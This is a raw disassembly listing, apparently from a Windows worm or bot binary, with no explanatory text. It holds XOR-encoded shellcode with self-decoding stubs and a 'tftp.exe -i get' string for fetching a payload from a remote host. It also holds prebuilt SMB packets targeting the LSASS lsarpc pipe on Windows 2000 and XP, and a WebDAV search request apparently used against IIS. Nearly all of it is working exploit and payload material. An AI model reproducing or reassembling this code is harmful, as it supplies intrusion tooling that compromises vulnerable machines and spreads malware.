dd offset aD_2 ; "D:\\"
; ---------------------------------------------------------------------------
loc_42B310: ; DATA XREF: sub_40F689+C0�o
jmp short loc_42B314
; ---------------------------------------------------------------------------
loc_42B312: ; CODE XREF: .data:loc_42B314�p
jmp short loc_42B319
; ---------------------------------------------------------------------------
loc_42B314: ; CODE XREF: .data:loc_42B310�j
call loc_42B312
loc_42B319: ; CODE XREF: .data:loc_42B312�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_42B31E dw 0FFFFh ; DATA XREF: sub_40F689:loc_40F73C�w
db 80h, 73h, 0Eh
byte_42B323 db 0FFh ; DATA XREF: sub_40F689+BA�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_42B328: ; DATA XREF: sub_40F689+9C�o
jmp short loc_42B32C
; ---------------------------------------------------------------------------
loc_42B32A: ; CODE XREF: .data:loc_42B32C�p
jmp short loc_42B331
; ---------------------------------------------------------------------------
loc_42B32C: ; CODE XREF: .data:loc_42B328�j
call loc_42B32A
loc_42B331: ; CODE XREF: .data:loc_42B32A�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_42B335 db 0FFh ; DATA XREF: sub_40F689+A1�w
dw 7380h
db 0Ch
byte_42B339 db 0FFh ; DATA XREF: sub_40F689+A7�w
dw 0E243h
dd 0F9h
dword_42B340 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_40F576+72�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_42B3A4 dd 12h aTftp_exeIGet db 'tftp.exe -i get ',0 ; DATA XREF: sub_40F576+96�o
aJ_1 db 'j',0
db 0E8h
dword_42B3BD dd 17h ; ---------------------------------------------------------------------------
jnz short near ptr byte_42B3C4
retn
; ---------------------------------------------------------------------------
byte_42B3C4 db 0E8h ; CODE XREF: .data:0042B3C1�j
dword_42B3C5 dd 1 byte_42B3C9 db 0, 6Ah, 0 ; DATA XREF: sub_40F576+EC�o
dd 7E8h
db 0, 0Fh, 84h
dword_42B3D3 dd 0FFFFFFEDh ; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
; ---------------------------------------------------------------------------
align 8
loc_42B408: ; DATA XREF: sub_411235:loc_41134E�o
mov edi, ecx
xor al, al
inc al
repne scasb
jmp edi
; ---------------------------------------------------------------------------
align 8
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_411235+18B�o
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
; ---------------------------------------------------------------------------
jmp short loc_42B4B2
; =============== S U B R O U T I N E =======================================
sub_42B4A2 proc far ; CODE XREF: sub_42B4A2:loc_42B4B2�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_42B4AA: ; CODE XREF: sub_42B4A2+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_42B4AA
jmp short loc_42B4B7
; ---------------------------------------------------------------------------
loc_42B4B2: ; CODE XREF: .data:0042B4A0�j
call near ptr sub_42B4A2
loc_42B4B7: ; CODE XREF: sub_42B4A2+E�j
jo short loc_42B51B
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_42B539
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_42B51B: ; CODE XREF: sub_42B4A2:loc_42B4B7�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_42B539: ; CODE XREF: sub_42B4A2+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_42B4A2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_42B5E0: ; DATA XREF: sub_411B71+112�o
; sub_411B71+1D9�o
jmp short loc_42B5F2
; =============== S U B R O U T I N E =======================================
sub_42B5E2 proc near ; CODE XREF: sub_42B5E2:loc_42B5F2�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_42B5EA: ; CODE XREF: sub_42B5E2+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42B5EA
jmp short loc_42B5F7
; ---------------------------------------------------------------------------
loc_42B5F2: ; CODE XREF: .data:loc_42B5E0�j
call sub_42B5E2
loc_42B5F7: ; CODE XREF: sub_42B5E2+E�j
jo short near ptr dword_42B570+1Eh
cwde
cdq
cdq
retn
sub_42B5E2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
word_42B690 dw 4B9Dh ; DATA XREF: sub_411B71+E5�w
dw 59AAh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dword_42B778 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:00411FEF�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_42B808 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0041201B�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 2 dup(0)
dword_42B8B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00412043�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_42B998 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411B71+53�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_4: ; DATA XREF: sub_411B71+90�o
unicode 0, <C$>,0
a????? db '?????',0
align 10h
dword_42BA00 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411B71+28B�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_42BA70 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411B71+2B2�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_42BB18 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411B71+383�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_42BB98 dd offset loc_401495 ; DATA XREF: sub_411B71+3A6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_42BC30 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411B71+2E2�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_42BCA0 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_411B71+307�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_42BD18 dd 0 dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 2 dup(0)
word_42BDA0 dw 0AD9Dh ; DATA XREF: sub_411A2E+2A�r
; sub_411B71+CC�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_42BDE0 dd 1004600h ; sub_411B71+223�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_42BE98: ; DATA XREF: .text:00412293�o
; .text:00412311�o
jmp short loc_42BEAA
; =============== S U B R O U T I N E =======================================
sub_42BE9A proc near ; CODE XREF: sub_42BE9A:loc_42BEAA�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_42BEA2: ; CODE XREF: sub_42BE9A+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42BEA2
jmp short loc_42BEAF
; ---------------------------------------------------------------------------
loc_42BEAA: ; CODE XREF: .data:loc_42BE98�j
call sub_42BE9A
loc_42BEAF: ; CODE XREF: sub_42BE9A+E�j
jo short near ptr dword_42BE1C+2Ah
cwde
cdq
cdq
retn
sub_42BE9A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
word_42BF48 dw 4B9Dh ; DATA XREF: .text:00412274�w
dw 59AAh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dword_42C030 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:0041243E�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_42C0C0 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00412470�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_42C170 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0041249B�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_42C250 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004121DE�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_5: ; DATA XREF: .text:00412221�o
unicode 0, <C$>,0
a?????_0 db '?????',0
dd 2 dup(0)
dword_42C2B8 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004124F3�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_42C328 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0041251E�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_42C3D0 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00412552�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_42C450 dd offset loc_401495 ; DATA XREF: .text:00412582�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_42C4E8 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004125B4�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_42C558 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004125D9�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_42C5D0 dd 0 dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfess_0 db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_42C690 dd 1004600h ; .text:004122F9�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0
dd 9875h, 9873h
off_42C718 dd offset sub_413498 ; DATA XREF: sub_4143FB�r
dd offset nullsub_1
dd offset nullsub_1
align 10h
dword_42C730 dd 19930520h, 3 dup(0) ; sub_413EDA+2�o
off_42C740 dd offset sub_414544 ; DATA XREF: sub_4148E1+1C�r
dword_42C744 dd 2 ; sub_419FC1+E�r ...
off_42C748 dd offset aNull_1 ; DATA XREF: sub_414CA3:loc_415069�r
; sub_414CA3+4E4�r
; "(null)"
off_42C74C dd offset aNull ; DATA XREF: sub_414CA3+2AC�r
; "(null)"
dword_42C750 dd 0FFFFFFFFh ; sub_415438+16�w ...
align 10h
dd 43h, 0
dword_42C768 dd 1, 8 dup(0) ; .data:off_42C7BC�o
dd 2 dup(1), 3 dup(0)
dd offset off_42D164
align 10h
dd offset word_427AB2
dd offset off_42D0A8
dd 0
off_42C7BC dd offset dword_42C768 ; DATA XREF: sub_412EBA+A�r
; sub_41364A+F�r ...
dd 0
dd 1, 8 dup(0)
dd 43h, 21h dup(0)
dd 43h, 23h dup(0)
off_42C900 dd offset dword_47A660 ; DATA XREF: sub_4165B6+52�o
; sub_416673+4�o ...
align 8
dd offset dword_47A660
dd 101h
dword_42C910 dd 2 dup(0) dd 1000h, 0
dword_42C920 dd 3 dup(0) ; sub_418FBC+12�o
dd 2, 1, 3 dup(0)
dword_42C940 dd 3 dup(0) ; sub_418FBC:loc_418FDA�o
dd 2 dup(2), 7 dup(0)
dword_42C970 dd 7Ch dup(0) dword_42CB60 dd 8 dup(0) ; sub_4166C5+D�o
dword_42CB80 dd 10h, 0 dword_42CB88 dd 0 ; sub_416818+8�o ...
dword_42CB8C dd 1 dd 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 22h dup(0)
dword_42CCA8 dd 2 dup(0) ; sub_416818+4A�o
dword_42CCB0 dd 1 dword_42CCB4 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_42CE18 dd offset sub_41C836 ; DATA XREF: sub_413460+5�w
; sub_414CA3+43E�r
off_42CE1C dd offset sub_41C836 ; DATA XREF: sub_413460+A�w
; sub_414CA3+46A�r
off_42CE20 dd offset sub_41C836 ; DATA XREF: sub_413460+14�w
; sub_41554C+40D�r
off_42CE24 dd offset sub_41C836 ; DATA XREF: sub_413460+1E�w
; sub_414CA3+459�r
off_42CE28 dd offset sub_41C836 ; DATA XREF: sub_413460+28�w
off_42CE2C dd offset sub_41C836 ; DATA XREF: sub_413460+32�w
off_42CE30 dd offset word_427AB2 ; DATA XREF: sub_41364A:loc_41371C�r
; sub_414CA3:loc_414EA2�r ...
dd offset dword_427CB8+2
dword_42CE38 dd 0BB40E64Eh ; sub_414CA3+9�r ...
dd offset sub_41CD5F
off_42CE40 dd offset sub_418F0B ; DATA XREF: sub_418F40+C�r
align 10h
byte_42CE50 db 1 ; DATA XREF: sub_4192C7+C8�r
db 2, 4, 8
align 8
dword_42CE58 dd 3A4h dword_42CE5C dd 82798260h dd 21h, 0
dword_42CE68 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
off_42CF48 dd offset sub_41CEA3 ; DATA XREF: sub_4197D8+11D�r
; sub_4197D8+1D8�r ...
dword_42CF4C dd 173Fh dword_42CF50 dd 2 ; sub_419E4A+32�r
off_42CF54 dd offset aR6002FloatingP ; DATA XREF: sub_419E4A+DE�r
; sub_419E4A+11B�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 42832Ch, 9, 428300h, 0Ah, 428268h, 10h, 42823Ch
dd 11h, 42820Ch, 12h, 4281E8h, 13h, 4281BCh, 18h, 428184h
dd 19h, 42815Ch, 1Ah, 428124h, 1Bh, 4280ECh, 1Ch, 4280C4h
dd 78h, 4280B4h, 79h, 4280A4h, 7Ah, 428094h, 0FCh, 420620h
dd 0FFh, 428084h
dword_42CFE0 dd 0C0000005h, 0Bh, 0 ; sub_4154C7+47�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_42D058 dd 3 ; sub_419FFA+A3�r ...
dword_42D05C dd 7 ; sub_419FFA+A9�r ...
dd 78h
dword_42D064 dd 0Ah ; sub_41E335�r
dword_42D068 dd 0FFFFFFFFh, 0A80h, 7 dup(0) ; sub_417455:loc_4174DB�o
dword_42D08C dd 1 byte_42D090 db 2Eh ; DATA XREF: sub_41554C:loc_415857�r
; sub_41554C+329�r ...
align 4
dd 1, 2 dup(0)
dd offset off_42D0A8
align 8
off_42D0A8 dd offset aSun ; DATA XREF: .data:0042C7B4�o
; .data:0042D0A0�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
